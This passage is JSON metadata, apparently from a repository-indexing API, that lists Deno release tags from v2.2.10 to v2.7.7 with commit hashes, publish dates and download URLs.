es_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub